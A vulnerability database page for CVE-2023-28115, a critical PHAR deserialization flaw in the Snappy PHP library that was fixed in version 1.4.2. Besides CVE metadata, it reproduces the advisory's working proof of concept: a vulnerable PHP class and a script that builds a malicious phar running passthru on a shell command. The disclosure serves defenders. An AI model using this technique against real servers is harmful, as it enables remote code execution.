Vulnerability-Lookup

CVE-2023-28115 (GCVE-0-2023-28115)

Vulnerability from cvelistv5 – Published: 2023-03-17 21:15 – Updated: 2025-02-25 14:53

Title

Snappy vulnerable to PHAR deserialization, allowing remote code execution

Summary

Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2.

Severity ?

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-502 - Deserialization of Untrusted Data

Assigner

GitHub_M

References

URL

Tags

	https://github.com/KnpLabs/snappy/security/adviso…	x_refsource_CONFIRM
	https://github.com/KnpLabs/snappy/pull/469	x_refsource_MISC
	https://github.com/KnpLabs/snappy/commit/1ee6360c…	x_refsource_MISC
	https://github.com/KnpLabs/snappy/commit/b66f7933…	x_refsource_MISC
	https://github.com/KnpLabs/snappy/blob/5126fb5b33…	x_refsource_MISC
	https://github.com/KnpLabs/snappy/releases/tag/v1.4.2	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	KnpLabs	snappy	Affected: < 1.4.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T12:30:24.135Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/pull/469",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/KnpLabs/snappy/pull/469"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-28115",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-02-25T14:31:03.179492Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-02-25T14:53:10.142Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "snappy",
          "vendor": "KnpLabs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.4.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-03-17T21:15:25.113Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
        },
        {
          "name": "https://github.com/KnpLabs/snappy/pull/469",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/KnpLabs/snappy/pull/469"
        },
        {
          "name": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
        },
        {
          "name": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
        },
        {
          "name": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
        },
        {
          "name": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
        }
      ],
      "source": {
        "advisory": "GHSA-gq6w-q6wh-jggc",
        "discovery": "UNKNOWN"
      },
      "title": "Snappy vulnerable to PHAR deserialization, allowing remote code execution"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-28115",
    "datePublished": "2023-03-17T21:15:25.113Z",
    "dateReserved": "2023-03-10T18:34:29.228Z",
    "dateUpdated": "2025-02-25T14:53:10.142Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:knplabs:snappy:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"1.4.2\", \"matchCriteriaId\": \"63871084-34B8-4CD8-ACEC-3EEAE2CA2EFE\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2.\"}]",
      "id": "CVE-2023-28115",
      "lastModified": "2024-11-21T07:54:26.183",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}]}",
      "published": "2023-03-17T22:15:11.437",
      "references": "[{\"url\": \"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Product\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/pull/469\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Product\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/pull/469\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-502\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2023-28115\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2023-03-17T22:15:11.437\",\"lastModified\":\"2024-11-21T07:54:26.183\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:knplabs:snappy:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.4.2\",\"matchCriteriaId\":\"63871084-34B8-4CD8-ACEC-3EEAE2CA2EFE\"}]}]}],\"references\":[{\"url\":\"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/pull/469\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/pull/469\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"name\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/pull/469\", \"name\": \"https://github.com/KnpLabs/snappy/pull/469\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\", \"name\": \"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\", \"name\": \"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\", \"name\": \"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\", \"name\": \"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T12:30:24.135Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-28115\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-02-25T14:31:03.179492Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-02-25T14:31:04.560Z\"}}], \"cna\": {\"title\": \"Snappy vulnerable to PHAR deserialization, allowing remote code execution\", \"source\": {\"advisory\": \"GHSA-gq6w-q6wh-jggc\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"KnpLabs\", \"product\": \"snappy\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.4.2\"}]}], \"references\": [{\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"name\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/pull/469\", \"name\": \"https://github.com/KnpLabs/snappy/pull/469\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\", \"name\": \"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\", \"name\": \"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\", \"name\": \"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\", \"name\": \"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-502\", \"description\": \"CWE-502: Deserialization of Untrusted Data\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2023-03-17T21:15:25.113Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2023-28115\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-02-25T14:53:10.142Z\", \"dateReserved\": \"2023-03-10T18:34:29.228Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2023-03-17T21:15:25.113Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-GQ6W-Q6WH-JGGC

Vulnerability from github – Published: 2023-03-17 18:24 – Updated: 2023-03-20 13:59

Summary

PHAR deserialization allowing remote code execution

Details

Description

snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the file_exists() function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the generateFromHtml() function, it will invoke deserialization.

Proof of Concept

Install Snappy via composer require knplabs/knp-snappy. After that, under snappy directory, create an index.php file with this vulnerable code.

<?php
// index.php

// include autoloader
require __DIR__ . '/vendor/autoload.php';

// reference the snappy namespace
use Knp\Snappy\Pdf;

// vulnerable object
class VulnerableClass {
    public $fileName;
    public $callback;

    function __destruct() {
        call_user_func($this->callback, $this->fileName);
    }
}

$snappy = new Pdf('/usr/local/bin/wkhtmltopdf');
// generate pdf from html content and save it at phar://poc.phar
$snappy->generateFromHtml('<h1>Bill</h1><p>You owe me money, dude.</p>', 'phar://poc.phar');

As an attacker, we going to generate the malicious phar using this script.

<?php
// generate_phar.php

class VulnerableClass { }
// Create a new instance of the Dummy class and modify its property
$dummy = new VulnerableClass();
$dummy->callback = "passthru";
$dummy->fileName = "uname -a > pwned"; //our payload

// Delete any existing PHAR archive with that name
@unlink("poc.phar");

// Create a new archive
$poc = new Phar("poc.phar");

// Add all write operations to a buffer, without modifying the archive on disk
$poc->startBuffering();

// Set the stub
$poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();");

// Add a new file in the archive with "text" as its content
$poc["file"] = "text";

// Add the dummy object to the metadata. This will be serialized
$poc->setMetadata($dummy);

// Stop buffering and write changes to disk
$poc->stopBuffering();
?>

Then run these command to generate the file

php --define phar.readonly=0 generate_phar.php

Then execute index.php with php index.php. You will see a file named pwned will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick.

Impact

This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains.

Occurences

https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670

References

https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/

Severity ?

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "knplabs/knp-snappy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-28115"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-17T18:24:24Z",
    "nvd_published_at": "2023-03-17T22:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "## Description\n\nsnappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the `generateFromHtml()` function, it will invoke deserialization.\n\n## Proof of Concept\n\nInstall Snappy via composer require `knplabs/knp-snappy`. After that, under snappy directory, create an `index.php` file with this vulnerable code.\n\n```php\n\u003c?php\n// index.php\n\n// include autoloader\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n\n// reference the snappy namespace\nuse Knp\\Snappy\\Pdf;\n\n// vulnerable object\nclass VulnerableClass {\n    public $fileName;\n    public $callback;\n\n    function __destruct() {\n        call_user_func($this-\u003ecallback, $this-\u003efileName);\n    }\n}\n\n$snappy = new Pdf(\u0027/usr/local/bin/wkhtmltopdf\u0027);\n// generate pdf from html content and save it at phar://poc.phar\n$snappy-\u003egenerateFromHtml(\u0027\u003ch1\u003eBill\u003c/h1\u003e\u003cp\u003eYou owe me money, dude.\u003c/p\u003e\u0027, \u0027phar://poc.phar\u0027);\n```\n\nAs an attacker, we going to generate the malicious phar using this script.\n\n```php\n\u003c?php\n// generate_phar.php\n\nclass VulnerableClass { }\n// Create a new instance of the Dummy class and modify its property\n$dummy = new VulnerableClass();\n$dummy-\u003ecallback = \"passthru\";\n$dummy-\u003efileName = \"uname -a \u003e pwned\"; //our payload\n\n// Delete any existing PHAR archive with that name\n@unlink(\"poc.phar\");\n\n// Create a new archive\n$poc = new Phar(\"poc.phar\");\n\n// Add all write operations to a buffer, without modifying the archive on disk\n$poc-\u003estartBuffering();\n\n// Set the stub\n$poc-\u003esetStub(\"\u003c?php echo \u0027Here is the STUB!\u0027; __HALT_COMPILER();\");\n\n// Add a new file in the archive with \"text\" as its content\n$poc[\"file\"] = \"text\";\n\n// Add the dummy object to the metadata. This will be serialized\n$poc-\u003esetMetadata($dummy);\n\n// Stop buffering and write changes to disk\n$poc-\u003estopBuffering();\n?\u003e\n```\n\nThen run these command to generate the file\n\n```php\nphp --define phar.readonly=0 generate_phar.php\n```\n\nThen execute index.php with `php index.php`. You will see a file named `pwned` will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick.\n\n## Impact\n\nThis vulnerability is capable of remote code execution if Snappy is used with frameworks or 